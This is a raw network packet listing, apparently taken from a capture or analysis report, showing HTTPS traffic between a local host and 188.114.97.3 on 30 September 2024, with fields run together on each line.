                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.339508057 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.339550018 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420695066 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420753956 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420764923 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420814037 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420886993 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420928955 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420933962 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420942068 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.420975924 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421082973 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421134949 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421247959 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421318054 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421385050 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421412945 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421430111 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421436071 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421462059 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.421475887 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422036886 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422090054 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422156096 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422199965 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422358036 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422386885 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422408104 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422416925 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422431946 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.422466993 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423017025 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423063993 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423080921 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423127890 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423295975 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423325062 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423343897 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423350096 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423361063 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423403025 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.423978090 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424030066 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424077034 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424124956 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424277067 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424307108 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424320936 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424326897 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424350977 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424365997 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424875021 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.424925089 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425029039 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425080061 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425327063 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425359964 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425368071 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425395966 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425401926 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425441027 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425868034 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425915956 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.425955057 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.426002979 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.507638931 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.507704973 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.507754087 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.507783890 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.507801056 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508145094 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508167982 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508213043 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508219957 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508255005 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508620977 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508636951 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508693933 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508702040 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.508728027 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.509068012 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.509085894 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.509123087 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.509129047 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.509167910 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.512626886 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.512649059 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.512696981 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.512706041 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.512744904 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513216019 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513233900 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513283968 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513293028 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513304949 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513657093 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513678074 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513716936 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513781071 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513791084 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.513998032 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.514012098 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.514054060 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.514061928 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.514090061 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.577673912 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.594820023 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.594835043 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.594877958 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.594898939 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.594912052 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595000029 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595024109 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595062971 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595083952 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595088959 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595103025 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595130920 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.595163107 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.605273008 CEST49711443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:10.605292082 CEST44349711188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:13.143702984 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:13.143754005 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:13.143815041 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:13.663391113 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:13.663414001 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.131722927 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.131795883 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.132951021 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.132965088 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.133250952 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.135206938 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.179400921 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301584005 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301624060 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301650047 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301673889 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301676989 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301688910 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301728010 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301737070 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.301784039 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.302052975 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.302094936 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.302105904 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.302128077 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.302164078 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.302170038 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373111010 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373145103 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373169899 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373191118 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373197079 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373226881 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373229027 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373260021 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373272896 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373281956 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373321056 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.373955965 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.390748024 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.390789986 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.390835047 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.390844107 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.390853882 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.390901089 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.390911102 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.391864061 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.391891003 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.391911030 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.391918898 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.391923904 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.391949892 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.392047882 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.392546892 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.392574072 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.392590046 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.392596006 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.392625093 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.392961025 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.393003941 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.393008947 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.393964052 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.394886971 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.394895077 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.461803913 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.461833000 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.461854935 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.461900949 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.461913109 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.461951971 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.462155104 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.462162971 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.462209940 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.462217093 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.463483095 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.463541985 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.463548899 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.463593006 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479010105 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479026079 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479094982 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479204893 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479252100 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479264975 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479274988 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479300022 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.479315042 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.480106115 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.480155945 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.480756044 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.480807066 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.480853081 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.480901003 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.481652975 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.481697083 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.481755972 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.481803894 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.482631922 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.482705116 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.483434916 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.483494043 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.483562946 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.483613968 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550302029 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550378084 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550384045 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550406933 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550436974 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550451994 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550607920 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.550656080 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.551130056 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.551176071 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.567347050 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.567445040 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.567445993 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.567456007 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.567490101 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.567512989 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.567557096 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568306923 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568350077 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568355083 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568399906 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568825960 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568876028 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568928957 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.568965912 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.569127083 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.569169998 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.569691896 CEST44349714188.114.97.3192.168.2.10
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.569736004 CEST49714443192.168.2.10188.114.97.3
                                                                                                                                                                                                                                                                                    Sep 30, 2024 18:20:14.569809914 CEST44349714188.114.97.3192.168.2.10
